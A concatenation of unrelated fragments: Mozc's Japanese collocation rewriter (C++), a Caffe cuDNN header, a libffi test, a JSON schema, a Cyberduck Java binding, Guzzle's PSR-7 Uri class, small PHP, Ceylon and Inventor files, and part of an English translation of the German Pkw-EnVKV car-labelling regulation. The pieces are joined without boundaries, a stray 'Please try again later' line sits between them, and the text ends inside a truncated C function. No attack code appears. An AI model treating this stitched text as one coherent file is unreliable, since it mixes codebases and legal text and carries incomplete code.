CollocationUtil::GetNormalizedScript(top_aux_value, (type == LEFT),
&top_aux_normalized);
if (!aux_normalized.empty() &&
!Util::IsScriptType(aux_normalized, Util::HIRAGANA)) {
if (type == RIGHT) {
return false;
}
if (aux_normalized != top_aux_normalized) {
return false;
}
}
ResolveCompoundSegment(top_value, value, type, output);
const size_t aux_value_len = Util::CharsLen(aux_value);
const size_t value_len = Util::CharsLen(value);
// "<XXいる|>" can be rewrited to "<YY|いる>" and vice versa
{
static const char kPat[] = "いる"; // "いる"
const absl::string_view kSuffix(kPat, arraysize(kPat) - 1);
if (top_aux_value_len == 0 && aux_value_len == 2 &&
Util::EndsWith(top_value, kSuffix) &&
Util::EndsWith(aux_value, kSuffix)) {
if (type == RIGHT) {
// "YYいる" in addition to "YY"
output->push_back(value);
}
return true;
}
if (aux_value_len == 0 && top_aux_value_len == 2 &&
Util::EndsWith(value, kSuffix) &&
Util::EndsWith(top_aux_value, kSuffix)) {
if (type == RIGHT) {
// "YY" in addition to "YYいる"
PushBackStringView(Util::Utf8SubString(value, 0, value_len - 2),
output);
}
return true;
}
}
// "<XXせる|>" can be rewrited to "<YY|せる>" and vice versa
{
const char kPat[] = "せる";
const absl::string_view kSuffix(kPat, arraysize(kPat) - 1);
if (top_aux_value_len == 0 && aux_value_len == 2 &&
Util::EndsWith(top_value, kSuffix) &&
Util::EndsWith(aux_value, kSuffix)) {
if (type == RIGHT) {
// "YYせる" in addition to "YY"
output->push_back(value);
}
return true;
}
if (aux_value_len == 0 && top_aux_value_len == 2 &&
Util::EndsWith(value, kSuffix) &&
Util::EndsWith(top_aux_value, kSuffix)) {
if (type == RIGHT) {
// "YY" in addition to "YYせる"
PushBackStringView(Util::Utf8SubString(value, 0, value_len - 2),
output);
}
return true;
}
}
const Util::ScriptType content_script_type = Util::GetScriptType(content);
// "<XX|する>" can be rewrited using "<XXす|る>" and "<XX|する>"
// in "<XX|する>", XX must be single script type
{
static const char kPat[] = "する";
const absl::string_view kSuffix(kPat, arraysize(kPat) - 1);
if (aux_value_len == 2 && Util::EndsWith(aux_value, kSuffix)) {
if (content_script_type != Util::KATAKANA &&
content_script_type != Util::HIRAGANA &&
content_script_type != Util::KANJI &&
content_script_type != Util::ALPHABET) {
return false;
}
if (type == RIGHT) {
// "YYす" in addition to "YY"
PushBackStringView(Util::Utf8SubString(value, 0, value_len - 1),
output);
}
return true;
}
}
// "<XXる>" can be rewrited using "<XX|る>"
// "まとめる", "衰える"
{
static const char kPat[] = "る";
const absl::string_view kSuffix(kPat, arraysize(kPat) - 1);
if (aux_value_len == 0 && Util::EndsWith(value, kSuffix)) {
if (type == RIGHT) {
// "YY" in addition to "YYる"
PushBackStringView(Util::Utf8SubString(value, 0, value_len - 1),
output);
}
return true;
}
}
// "<XXす>" can be rewrited using "XXする"
{
static const char kPat[] = "す";
const absl::string_view kSuffix(kPat, arraysize(kPat) - 1);
if (Util::EndsWith(value, kSuffix) &&
Util::IsScriptType(Util::Utf8SubString(value, 0, value_len - 1),
Util::KANJI)) {
if (type == RIGHT) {
const char kRu[] = "る";
// "YYする" in addition to "YY"
output->push_back(
absl::StrCat(value, absl::string_view(kRu, arraysize(kRu) - 1)));
}
return true;
}
}
// "<XXし|た>" can be rewrited using "<XX|した>"
{
static const char kPat[] = "した";
const absl::string_view kShi(kPat, 3), kTa(kPat + 3, 3);
if (Util::EndsWith(content, kShi) && aux_value == kTa &&
Util::EndsWith(top_content, kShi) && top_aux_value == kTa) {
if (type == RIGHT) {
const absl::string_view val =
Util::Utf8SubString(content, 0, content_len - 1);
// XX must be KANJI
if (Util::IsScriptType(val, Util::KANJI)) {
PushBackStringView(val, output);
}
}
return true;
}
}
const int aux_len = value_len - content_len;
const int top_aux_len = Util::CharsLen(top_value) - top_content_len;
if (aux_len != top_aux_len) {
return false;
}
const Util::ScriptType top_content_script_type =
Util::GetScriptType(top_content);
// we don't rewrite HIRAGANA to KATAKANA
if (top_content_script_type == Util::HIRAGANA &&
content_script_type == Util::KATAKANA) {
return false;
}
// we don't rewrite second KATAKANA
// for example, we don't rewrite "このコーヒー" to "この珈琲"
if (type == RIGHT && top_content_script_type == Util::KATAKANA &&
value != top_value) {
return false;
}
if (top_content_len == 1 && top_content_script_type == Util::HIRAGANA) {
return false;
}
// suppress "<身|ています>" etc.
if (top_content_len == 1 && content_len == 1 && top_aux_value_len >= 2 &&
aux_value_len >= 2 && top_content_script_type == Util::KANJI &&
content_script_type == Util::KANJI && top_content != content) {
return false;
}
return true;
}
// Just a wrapper around IsNaturalContent() for debugging.
bool VerifyNaturalContent(const Segment::Candidate &cand,
const Segment::Candidate &top_cand,
SegmentLookupType type) {
std::vector<std::string> nexts;
  return IsNaturalContent(cand, top_cand, type, &nexts);
}
inline bool IsKeyUnknown(const Segment &seg) {
return Util::IsScriptType(seg.key(), Util::UNKNOWN_SCRIPT);
}
} // namespace
bool CollocationRewriter::RewriteCollocation(Segments *segments) const {
// return false if at least one segment is fixed.
for (size_t i = segments->history_segments_size();
i < segments->segments_size(); ++i) {
if (segments->segment(i).segment_type() == Segment::FIXED_VALUE) {
return false;
}
}
std::vector<bool> segs_changed(segments->segments_size(), false);
bool changed = false;
for (size_t i = segments->history_segments_size();
i < segments->segments_size(); ++i) {
    bool rewrote_next = false;
if (IsKeyUnknown(segments->segment(i))) {
continue;
}
if (i + 1 < segments->segments_size() &&
RewriteUsingNextSegment(segments->mutable_segment(i + 1),
segments->mutable_segment(i))) {
changed = true;
      rewrote_next = true;
segs_changed[i] = true;
segs_changed[i + 1] = true;
}
    if (!segs_changed[i] && !rewrote_next && i > 0 &&
RewriteFromPrevSegment(segments->segment(i - 1).candidate(0),
segments->mutable_segment(i))) {
changed = true;
segs_changed[i - 1] = true;
segs_changed[i] = true;
}
const Segment::Candidate &cand = segments->segment(i).candidate(0);
if (i >= 2 &&
// Cross over only adverbs
// Segment is adverb if;
// 1) lid and rid is adverb.
// 2) or rid is adverb suffix.
((pos_matcher_.IsAdverb(segments->segment(i - 1).candidate(0).lid) &&
pos_matcher_.IsAdverb(segments->segment(i - 1).candidate(0).rid)) ||
pos_matcher_.IsAdverbSegmentSuffix(
segments->segment(i - 1).candidate(0).rid)) &&
(cand.content_value != cand.value ||
cand.value != "・")) { // "・" workaround
if (!segs_changed[i - 2] && !segs_changed[i] &&
RewriteUsingNextSegment(segments->mutable_segment(i),
segments->mutable_segment(i - 2))) {
changed = true;
segs_changed[i] = true;
segs_changed[i - 2] = true;
} else if (!segs_changed[i] &&
RewriteFromPrevSegment(segments->segment(i - 2).candidate(0),
segments->mutable_segment(i))) {
changed = true;
segs_changed[i] = true;
segs_changed[i - 2] = true;
}
}
}
return changed;
}
class CollocationRewriter::CollocationFilter {
public:
CollocationFilter(const char *existence_data, size_t size)
: filter_(ExistenceFilter::Read(existence_data, size)) {}
~CollocationFilter() {}
bool Exists(const std::string &left, const std::string &right) const {
if (left.empty() || right.empty()) {
return false;
}
std::string key;
key.reserve(left.size() + right.size());
key.assign(left).append(right);
const uint64 id = Hash::Fingerprint(key);
return filter_->Exists(id);
}
private:
std::unique_ptr<ExistenceFilter> filter_;
DISALLOW_COPY_AND_ASSIGN(CollocationFilter);
};
class CollocationRewriter::SuppressionFilter {
public:
SuppressionFilter(const char *suppression_data, size_t size)
: filter_(ExistenceFilter::Read(suppression_data, size)) {}
~SuppressionFilter() {}
bool Exists(const Segment::Candidate &cand) const {
// TODO(noriyukit): We should share key generation rule with
// gen_collocation_suppression_data_main.cc.
std::string key;
key.reserve(cand.content_value.size() + 1 + cand.content_key.size());
key.assign(cand.content_value).append("\t").append(cand.content_key);
const uint64 id = Hash::Fingerprint(key);
return filter_->Exists(id);
}
private:
std::unique_ptr<ExistenceFilter> filter_;
DISALLOW_COPY_AND_ASSIGN(SuppressionFilter);
};
CollocationRewriter::CollocationRewriter(
const DataManagerInterface *data_manager)
: pos_matcher_(data_manager->GetPOSMatcherData()),
first_name_id_(pos_matcher_.GetFirstNameId()),
last_name_id_(pos_matcher_.GetLastNameId()) {
const char *data = NULL;
size_t size = 0;
data_manager->GetCollocationData(&data, &size);
collocation_filter_.reset(new CollocationFilter(data, size));
data_manager->GetCollocationSuppressionData(&data, &size);
suppression_filter_.reset(new SuppressionFilter(data, size));
}
CollocationRewriter::~CollocationRewriter() {}
bool CollocationRewriter::Rewrite(const ConversionRequest &request,
Segments *segments) const {
if (!FLAGS_use_collocation) {
return false;
}
return RewriteCollocation(segments);
}
bool CollocationRewriter::IsName(const Segment::Candidate &cand) const {
const bool ret = (cand.lid == last_name_id_ || cand.lid == first_name_id_);
  VLOG_IF(3, ret) << cand.value << " is a name segment";
return ret;
}
bool CollocationRewriter::RewriteFromPrevSegment(
const Segment::Candidate &prev_cand, Segment *seg) const {
std::string prev;
CollocationUtil::GetNormalizedScript(prev_cand.value, true, &prev);
const size_t i_max = std::min(seg->candidates_size(), kCandidateSize);
// Reuse |curs| and |cur| in the loop as this method is performance critical.
std::vector<std::string> curs;
std::string cur;
for (size_t i = 0; i < i_max; ++i) {
if (seg->candidate(i).cost > seg->candidate(0).cost + kMaxCostDiff) {
continue;
}
if (IsName(seg->candidate(i))) {
continue;
}
if (suppression_filter_->Exists(seg->candidate(i))) {
continue;
}
curs.clear();
if (!IsNaturalContent(seg->candidate(i), seg->candidate(0), RIGHT, &curs)) {
continue;
}
for (int j = 0; j < curs.size(); ++j) {
cur.clear();
CollocationUtil::GetNormalizedScript(curs[j], false, &cur);
if (collocation_filter_->Exists(prev, cur)) {
VLOG_IF(3, i != 0) << prev << cur << " " << seg->candidate(0).value
<< "->" << seg->candidate(i).value;
seg->move_candidate(i, 0);
seg->mutable_candidate(0)->attributes |=
Segment::Candidate::CONTEXT_SENSITIVE;
return true;
}
}
}
return false;
}
bool CollocationRewriter::RewriteUsingNextSegment(Segment *next_seg,
Segment *seg) const {
const size_t i_max = std::min(seg->candidates_size(), kCandidateSize);
const size_t j_max = std::min(next_seg->candidates_size(), kCandidateSize);
// Cache the results for the next segment
std::vector<int> next_seg_ok(j_max); // Avoiding std::vector<bool>
std::vector<std::vector<std::string> > normalized_string(j_max);
// Reuse |nexts| in the loop as this method is performance critical.
std::vector<std::string> nexts;
for (size_t j = 0; j < j_max; ++j) {
next_seg_ok[j] = 0;
if (IsName(next_seg->candidate(j))) {
continue;
}
if (suppression_filter_->Exists(next_seg->candidate(j))) {
continue;
}
nexts.clear();
if (!IsNaturalContent(next_seg->candidate(j), next_seg->candidate(0), RIGHT,
&nexts)) {
continue;
}
next_seg_ok[j] = 1;
for (std::vector<std::string>::const_iterator it = nexts.begin();
it != nexts.end(); ++it) {
normalized_string[j].push_back(std::string());
CollocationUtil::GetNormalizedScript(*it, false,
&normalized_string[j].back());
}
}
// Reuse |curs| and |cur| in the loop as this method is performance critical.
std::vector<std::string> curs;
std::string cur;
for (size_t i = 0; i < i_max; ++i) {
if (seg->candidate(i).cost > seg->candidate(0).cost + kMaxCostDiff) {
continue;
}
if (IsName(seg->candidate(i))) {
continue;
}
if (suppression_filter_->Exists(seg->candidate(i))) {
continue;
}
curs.clear();
if (!IsNaturalContent(seg->candidate(i), seg->candidate(0), LEFT, &curs)) {
continue;
}
for (int k = 0; k < curs.size(); ++k) {
cur.clear();
CollocationUtil::GetNormalizedScript(curs[k], true, &cur);
for (size_t j = 0; j < j_max; ++j) {
if (next_seg->candidate(j).cost >
next_seg->candidate(0).cost + kMaxCostDiff) {
continue;
}
if (!next_seg_ok[j]) {
continue;
}
for (int l = 0; l < normalized_string[j].size(); ++l) {
const std::string &next = normalized_string[j][l];
if (collocation_filter_->Exists(cur, next)) {
DCHECK(VerifyNaturalContent(next_seg->candidate(j),
next_seg->candidate(0), RIGHT))
<< "IsNaturalContent() should not fail here.";
seg->move_candidate(i, 0);
seg->mutable_candidate(0)->attributes |=
Segment::Candidate::CONTEXT_SENSITIVE;
next_seg->move_candidate(j, 0);
next_seg->mutable_candidate(0)->attributes |=
Segment::Candidate::CONTEXT_SENSITIVE;
return true;
}
}
}
}
}
return false;
}
} // namespace mozc
#ifndef CAFFE_CUDNN_SIGMOID_LAYER_HPP_
#define CAFFE_CUDNN_SIGMOID_LAYER_HPP_
#include "./cudnn.hpp"
#include "../sigmoid_layer.hpp"
namespace caffe {
#ifdef USE_CUDNN
/**
* @brief CuDNN acceleration of SigmoidLayer.
*/
class CuDNNSigmoidLayer : public SigmoidLayer {
public:
explicit CuDNNSigmoidLayer(const LayerParameter& param)
: SigmoidLayer(param), handles_setup_(false) {}
virtual void LayerSetUp(const vector<Blob*>& bottom,
const vector<Blob*>& top);
virtual void Reshape(const vector<Blob*>& bottom,
const vector<Blob*>& top);
virtual ~CuDNNSigmoidLayer();
protected:
virtual void Forward_gpu(const vector<Blob*>& bottom,
const vector<Blob*>& top);
bool handles_setup_;
cudnnHandle_t handle_;
cudnnTensorDescriptor_t bottom_desc_;
cudnnTensorDescriptor_t top_desc_;
cudnnActivationDescriptor_t activ_desc_;
};
#endif // USE_CUDNN
} // namespace caffe
#endif // CAFFE_CUDNN_SIGMOID_LAYER_HPP_
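// Editor's sketch (illustrative, not part of this header): typical driving
// code when built with USE_CUDNN; "param", "bottom" and "top" are assumed to
// be prepared by the caller.
//
//   caffe::LayerParameter param;
//   caffe::CuDNNSigmoidLayer layer(param);
//   layer.LayerSetUp(bottom, top);  // creates the cuDNN handle and descriptors
//   layer.Reshape(bottom, top);     // sizes bottom_desc_ and top_desc_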
/* Area: ffi_call
Purpose: Check return value double.
Limitations: none.
PR: none.
Originator: <[email protected]> 20050212 */
/* { dg-do run } */
#include "ffitest.h"
static double return_dbl(double dbl)
{
printf ("%f\n", dbl);
return 2 * dbl;
}
int main (void)
{
ffi_cif cif;
ffi_type *args[MAX_ARGS];
void *values[MAX_ARGS];
double dbl, rdbl;
args[0] = &ffi_type_double;
values[0] = &dbl;
/* Initialize the cif */
CHECK(ffi_prep_cif(&cif, FFI_DEFAULT_ABI, 1,
&ffi_type_double, args) == FFI_OK);
for (dbl = -127.3; dbl < 127; dbl++)
{
ffi_call(&cif, FFI_FN(return_dbl), &rdbl, values);
printf ("%f vs %f\n", rdbl, return_dbl(dbl));
CHECK(rdbl == 2 * dbl);
}
exit(0);
}
{
"id": "query.json#",
"type": "object",
"required": [
"name",
"value"
],
"properties": {
"name": {
"type": "string"
},
"value": {
"type": "string"
},
"comment": {
"type": "string"
}
}
}
package ch.cyberduck.core.threading;
/*
* Copyright (c) 2002-2016 iterate GmbH. All rights reserved.
* https://cyberduck.io/
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*/
import ch.cyberduck.binding.foundation.NSObject;
import org.rococoa.ObjCClass;
import org.rococoa.Rococoa;
public abstract class NSOperation extends NSObject {
public static final _Class CLASS = Rococoa.createClass(NSOperation.class.getSimpleName(), _Class.class);
public interface _Class extends ObjCClass {
NSOperation alloc();
}
public abstract NSOperation init();
public abstract void start();
public abstract void main();
public abstract void cancel();
public abstract void waitUntilFinished();
public abstract boolean isCancelled();
public abstract boolean isExecuting();
public abstract boolean isFinished();
public abstract boolean isConcurrent();
public abstract boolean isReady();
}
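// Editor's sketch (illustrative): a caller typically drives the bridged
// Objective-C lifecycle like this, where "op" is a concrete NSOperation
// obtained elsewhere through Rococoa:
//
//   op.start();
//   op.waitUntilFinished();
//   boolean done = op.isFinished() && !op.isCancelled();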
Please try again later
<?php
namespace GuzzleHttp\Psr7;
use Psr\Http\Message\UriInterface;
/**
* PSR-7 URI implementation.
*
* @author Michael Dowling
* @author Tobias Schultze
* @author Matthew Weier O'Phinney
*/
class Uri implements UriInterface
{
private static $schemes = [
'http' => 80,
'https' => 443,
];
private static $charUnreserved = 'a-zA-Z0-9_\-\.~';
private static $charSubDelims = '!\$&\'\(\)\*\+,;=';
private static $replaceQuery = ['=' => '%3D', '&' => '%26'];
/** @var string Uri scheme. */
private $scheme = '';
/** @var string Uri user info. */
private $userInfo = '';
/** @var string Uri host. */
private $host = '';
/** @var int|null Uri port. */
private $port;
/** @var string Uri path. */
private $path = '';
/** @var string Uri query string. */
private $query = '';
/** @var string Uri fragment. */
private $fragment = '';
/**
* @param string $uri URI to parse
*/
public function __construct($uri = '')
{
if ($uri != '') {
$parts = parse_url($uri);
if ($parts === false) {
throw new \InvalidArgumentException("Unable to parse URI: $uri");
}
$this->applyParts($parts);
}
}
public function __toString()
{
return self::createUriString(
$this->scheme,
$this->getAuthority(),
$this->path,
$this->query,
$this->fragment
);
}
/**
* Removes dot segments from a path and returns the new path.
*
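     * For example, "/a/b/../c" is normalized to "/a/c".
     *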
* @param string $path
*
* @return string
* @link http://tools.ietf.org/html/rfc3986#section-5.2.4
*/
public static function removeDotSegments($path)
{
static $noopPaths = ['' => true, '/' => true, '*' => true];
static $ignoreSegments = ['.' => true, '..' => true];
if (isset($noopPaths[$path])) {
return $path;
}
$results = [];
$segments = explode('/', $path);
foreach ($segments as $segment) {
if ($segment === '..') {
array_pop($results);
} elseif (!isset($ignoreSegments[$segment])) {
$results[] = $segment;
}
}
$newPath = implode('/', $results);
// Add the leading slash if necessary
if (substr($path, 0, 1) === '/' &&
substr($newPath, 0, 1) !== '/'
) {
$newPath = '/' . $newPath;
}
// Add the trailing slash if necessary
if ($newPath !== '/' && isset($ignoreSegments[end($segments)])) {
$newPath .= '/';
}
return $newPath;
}
/**
* Resolve a base URI with a relative URI and return a new URI.
*
* @param UriInterface $base Base URI
* @param string|UriInterface $rel Relative URI
*
* @return UriInterface
* @link http://tools.ietf.org/html/rfc3986#section-5.2
*/
public static function resolve(UriInterface $base, $rel)
{
if (!($rel instanceof UriInterface)) {
$rel = new self($rel);
}
if ((string) $rel === '') {
// we can simply return the same base URI instance for this same-document reference
return $base;
}
if ($rel->getScheme() != '') {
return $rel->withPath(self::removeDotSegments($rel->getPath()));
}
if ($rel->getAuthority() != '') {
$targetAuthority = $rel->getAuthority();
$targetPath = self::removeDotSegments($rel->getPath());
$targetQuery = $rel->getQuery();
} else {
$targetAuthority = $base->getAuthority();
if ($rel->getPath() === '') {
$targetPath = $base->getPath();
$targetQuery = $rel->getQuery() != '' ? $rel->getQuery() : $base->getQuery();
} else {
if ($rel->getPath()[0] === '/') {
$targetPath = $rel->getPath();
} else {
if ($targetAuthority != '' && $base->getPath() === '') {
$targetPath = '/' . $rel->getPath();
} else {
$lastSlashPos = strrpos($base->getPath(), '/');
if ($lastSlashPos === false) {
$targetPath = $rel->getPath();
} else {
$targetPath = substr($base->getPath(), 0, $lastSlashPos + 1) . $rel->getPath();
}
}
}
$targetPath = self::removeDotSegments($targetPath);
$targetQuery = $rel->getQuery();
}
}
return new self(self::createUriString(
$base->getScheme(),
$targetAuthority,
$targetPath,
$targetQuery,
$rel->getFragment()
));
}
/**
* Create a new URI with a specific query string value removed.
*
* Any existing query string values that exactly match the provided key are
* removed.
*
* @param UriInterface $uri URI to use as a base.
* @param string $key Query string key to remove.
*
* @return UriInterface
*/
public static function withoutQueryValue(UriInterface $uri, $key)
{
$current = $uri->getQuery();
if ($current == '') {
return $uri;
}
$decodedKey = rawurldecode($key);
$result = array_filter(explode('&', $current), function ($part) use ($decodedKey) {
return rawurldecode(explode('=', $part)[0]) !== $decodedKey;
});
return $uri->withQuery(implode('&', $result));
}
/**
* Create a new URI with a specific query string value.
*
* Any existing query string values that exactly match the provided key are
* removed and replaced with the given key value pair.
*
* A value of null will set the query string key without a value, e.g. "key"
* instead of "key=value".
*
* @param UriInterface $uri URI to use as a base.
* @param string $key Key to set.
* @param string|null $value Value to set
*
* @return UriInterface
*/
public static function withQueryValue(UriInterface $uri, $key, $value)
{
$current = $uri->getQuery();
if ($current == '') {
$result = [];
} else {
$decodedKey = rawurldecode($key);
$result = array_filter(explode('&', $current), function ($part) use ($decodedKey) {
return rawurldecode(explode('=', $part)[0]) !== $decodedKey;
});
}
// Query string separators ("=", "&") within the key or value need to be encoded
// (while preventing double-encoding) before setting the query string. All other
// chars that need percent-encoding will be encoded by withQuery().
$key = strtr($key, self::$replaceQuery);
if ($value !== null) {
$result[] = $key . '=' . strtr($value, self::$replaceQuery);
} else {
$result[] = $key;
}
return $uri->withQuery(implode('&', $result));
}
/**
* Create a URI from a hash of parse_url parts.
*
* @param array $parts
*
* @return self
*/
public static function fromParts(array $parts)
{
$uri = new self();
$uri->applyParts($parts);
return $uri;
}
public function getScheme()
{
return $this->scheme;
}
public function getAuthority()
{
if ($this->host == '') {
return '';
}
$authority = $this->host;
if ($this->userInfo != '') {
$authority = $this->userInfo . '@' . $authority;
}
if ($this->port !== null) {
$authority .= ':' . $this->port;
}
return $authority;
}
public function getUserInfo()
{
return $this->userInfo;
}
public function getHost()
{
return $this->host;
}
public function getPort()
{
return $this->port;
}
public function getPath()
{
return $this->path;
}
public function getQuery()
{
return $this->query;
}
public function getFragment()
{
return $this->fragment;
}
public function withScheme($scheme)
{
$scheme = $this->filterScheme($scheme);
if ($this->scheme === $scheme) {
return $this;
}
$new = clone $this;
$new->scheme = $scheme;
$new->port = $new->filterPort($new->port);
return $new;
}
public function withUserInfo($user, $password = null)
{
$info = $user;
if ($password != '') {
$info .= ':' . $password;
}
if ($this->userInfo === $info) {
return $this;
}
$new = clone $this;
$new->userInfo = $info;
return $new;
}
public function withHost($host)
{
$host = $this->filterHost($host);
if ($this->host === $host) {
return $this;
}
$new = clone $this;
$new->host = $host;
return $new;
}
public function withPort($port)
{
$port = $this->filterPort($port);
if ($this->port === $port) {
return $this;
}
$new = clone $this;
$new->port = $port;
return $new;
}
public function withPath($path)
{
$path = $this->filterPath($path);
if ($this->path === $path) {
return $this;
}
$new = clone $this;
$new->path = $path;
return $new;
}
public function withQuery($query)
{
$query = $this->filterQueryAndFragment($query);
if ($this->query === $query) {
return $this;
}
$new = clone $this;
$new->query = $query;
return $new;
}
public function withFragment($fragment)
{
$fragment = $this->filterQueryAndFragment($fragment);
if ($this->fragment === $fragment) {
return $this;
}
$new = clone $this;
$new->fragment = $fragment;
return $new;
}
/**
* Apply parse_url parts to a URI.
*
* @param array $parts Array of parse_url parts to apply.
*/
private function applyParts(array $parts)
{
$this->scheme = isset($parts['scheme'])
? $this->filterScheme($parts['scheme'])
: '';
$this->userInfo = isset($parts['user']) ? $parts['user'] : '';
$this->host = isset($parts['host'])
? $this->filterHost($parts['host'])
: '';
$this->port = isset($parts['port'])
? $this->filterPort($parts['port'])
: null;
$this->path = isset($parts['path'])
? $this->filterPath($parts['path'])
: '';
$this->query = isset($parts['query'])
? $this->filterQueryAndFragment($parts['query'])
: '';
$this->fragment = isset($parts['fragment'])
? $this->filterQueryAndFragment($parts['fragment'])
: '';
if (isset($parts['pass'])) {
$this->userInfo .= ':' . $parts['pass'];
}
}
/**
* Create a URI string from its various parts
*
* @param string $scheme
* @param string $authority
* @param string $path
* @param string $query
* @param string $fragment
* @return string
*/
private static function createUriString($scheme, $authority, $path, $query, $fragment)
{
$uri = '';
if ($scheme != '') {
$uri .= $scheme . ':';
}
if ($authority != '') {
$uri .= '//' . $authority;
}
if ($path != '') {
if ($path[0] !== '/') {
if ($authority != '') {
// If the path is rootless and an authority is present, the path MUST be prefixed by "/"
$path = '/' . $path;
}
} elseif (isset($path[1]) && $path[1] === '/') {
if ($authority == '') {
// If the path is starting with more than one "/" and no authority is present, the
// starting slashes MUST be reduced to one.
$path = '/' . ltrim($path, '/');
}
}
$uri .= $path;
}
if ($query != '') {
$uri .= '?' . $query;
}
if ($fragment != '') {
$uri .= '#' . $fragment;
}
return $uri;
}
/**
* Is a given port non-standard for the current scheme?
*
* @param string $scheme
* @param int $port
*
* @return bool
*/
private static function isNonStandardPort($scheme, $port)
{
return !isset(self::$schemes[$scheme]) || $port !== self::$schemes[$scheme];
}
/**
* @param string $scheme
*
* @return string
*
* @throws \InvalidArgumentException If the scheme is invalid.
*/
private function filterScheme($scheme)
{
if (!is_string($scheme)) {
throw new \InvalidArgumentException('Scheme must be a string');
}
return strtolower($scheme);
}
/**
* @param string $host
*
* @return string
*
* @throws \InvalidArgumentException If the host is invalid.
*/
private function filterHost($host)
{
if (!is_string($host)) {
throw new \InvalidArgumentException('Host must be a string');
}
return strtolower($host);
}
/**
* @param int|null $port
*
* @return int|null
*
* @throws \InvalidArgumentException If the port is invalid.
*/
private function filterPort($port)
{
if ($port === null) {
return null;
}
$port = (int) $port;
if (1 > $port || 0xffff < $port) {
throw new \InvalidArgumentException(
sprintf('Invalid port: %d. Must be between 1 and 65535', $port)
);
}
return self::isNonStandardPort($this->scheme, $port) ? $port : null;
}
/**
* Filters the path of a URI
*
* @param string $path
*
* @return string
*
* @throws \InvalidArgumentException If the path is invalid.
*/
private function filterPath($path)
{
if (!is_string($path)) {
throw new \InvalidArgumentException('Path must be a string');
}
return preg_replace_callback(
'/(?:[^' . self::$charUnreserved . self::$charSubDelims . '%:@\/]++|%(?![A-Fa-f0-9]{2}))/',
[$this, 'rawurlencodeMatchZero'],
$path
);
}
/**
* Filters the query string or fragment of a URI.
*
* @param string $str
*
* @return string
*
* @throws \InvalidArgumentException If the query or fragment is invalid.
*/
private function filterQueryAndFragment($str)
{
if (!is_string($str)) {
throw new \InvalidArgumentException('Query and fragment must be a string');
}
return preg_replace_callback(
'/(?:[^' . self::$charUnreserved . self::$charSubDelims . '%:@\/\?]++|%(?![A-Fa-f0-9]{2}))/',
[$this, 'rawurlencodeMatchZero'],
$str
);
}
private function rawurlencodeMatchZero(array $match)
{
return rawurlencode($match[0]);
}
}
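/*
 * Editor's sketch (illustrative values only):
 *
 *   $base = new Uri('http://example.com/a/b?x=1');
 *   echo Uri::resolve($base, '../c');           // http://example.com/c
 *   echo Uri::withQueryValue($base, 'y', '2');  // http://example.com/a/b?x=1&y=2
 */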
<?php
namespace Foo\BarScoped {
class TestClass {
}
}
"Some module"
license ("http://www.apache.org/licenses/LICENSE-2.0.html")
module org.eclipse.ceylon.compiler.typechecker.test.modulec "1" {
shared import "org.eclipse.ceylon.compiler.typechecker.test.moduled" "1";
}
#Inventor V1.0 ascii
Material {
ambientColor 0 0.03109788 0
diffuseColor 0 0.12245365 0
specularColor 0.35663385 0.35663385 0.35663385
emissiveColor 0 0 0
shininess 0.08108644
transparency 0
}
---
Title: Regulation on consumer information on the fuel consumption, CO2 emissions
and electricity consumption of new passenger cars
jurabk: Pkw-EnVKV
layout: default
origslug: pkw-envkv
slug: pkw-envkv
---
# Regulation on consumer information on the fuel consumption, CO2 emissions and electricity consumption of new passenger cars (Pkw-EnVKV)
Date of issue
: 2004-05-28
Published in
: BGBl I: 2004, 1037
Last amended by
: Art. 3 G v. 10.5.2012 I 1070
This Regulation serves to implement Directive 1999/94/EC of the European
Parliament and of the Council of 13 December 1999 relating to the availability
of consumer information on fuel economy and CO2 emissions in respect of the
marketing of new passenger cars (OJ EC 2000 No. L 12, p. 16), as last amended
by Regulation (EC) No 1882/2003 of the European Parliament and of the Council
of 29 September 2003 (OJ EU No. L 284, p. 1).
## Enacting formula

On the basis of § 1 (1) No. 1 in conjunction with § 1 (2) and (3) Nos. 1 and
3 to 5 of the Energy Consumption Labelling Act of 30 January 2002 (BGBl. I
p. 570), of which § 1 (1) and (2) were amended by Article 135 of the
Regulation of 25 November 2003 (BGBl. I p. 2304), the Federal Ministry of
Economics and Labour, in agreement with the Federal Ministry for the
Environment, Nature Conservation and Nuclear Safety, ordains as follows:
## § 1 Labelling obligation
(1) Manufacturers and dealers who display new passenger cars, offer them
for sale or leasing, or advertise them must in doing so provide information
on the fuel consumption, the CO2 emissions and, where applicable, the
electricity consumption in accordance with §§ 3 to 5 and Annexes 1 to 4.
(2) The following units are to be used in this information:
1. for
a) the fuel consumption, litres per 100 kilometres (l/100 km),
b) the consumption of natural gas or biogas used as fuel, by way of
derogation from a), kilograms per 100 kilometres (kg/100 km); the value
taken from the EC certificate of conformity (CoC) and stated in cubic
metres per 100 kilometres (m3/100 km) is to be converted by the
manufacturer into kilograms per 100 kilometres (kg/100 km) using the
reference density value for natural gas laid down in Annex XII
paragraph 2.3 of Regulation (EC) No 715/2007 of the European Parliament
and of the Council of 20 June 2007 on type approval of motor vehicles
(Euro 5 and Euro 6) and on access to vehicle repair and maintenance
information (OJ L 171, 29.6.2007, p. 1), in conjunction with Regulation
(EC) No 692/2008 of the European Parliament and of the Council of
18 July 2008 implementing and amending Regulation (EC) No 715/2007 of the
European Parliament and of the Council on type approval of motor vehicles
(Euro 5 and Euro 6) and on access to vehicle repair and maintenance
information (OJ L 199, 28.7.2008, p. 1),
c) the electricity consumption of purely electrically powered vehicles,
fuel cell vehicles and externally chargeable hybrid electric vehicles,
kilowatt-hours per 100 kilometres (kWh/100 km); the value taken from the
EC certificate of conformity (CoC) and stated in watt-hours per kilometre
(Wh/km) is to be converted by the manufacturer into kilowatt-hours per
100 kilometres (kWh/100 km).
The consumption is in each case to be rounded up or down to the first
decimal place according to commercial rounding rules.
2. for the CO2 emissions, grams per kilometre (g/km), in each case rounded
up or down to a whole number according to commercial rounding rules.
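
The two unit conversions prescribed in § 1(2) above are simple scalings. A
minimal sketch in C; the natural-gas reference density of 0.654 kg/m3 used
here is an assumption, the binding value being the one fixed in the
regulations cited under b):

```c
#include <stdio.h>

/* § 1(2) Pkw-EnVKV unit conversions (sketch).
 * ASSUMPTION: 0.654 kg/m3 as the natural-gas reference density; the
 * binding value is the one laid down in Regulation (EC) No 715/2007
 * in conjunction with Regulation (EC) No 692/2008. */
static double gas_kg_per_100km(double m3_per_100km) {
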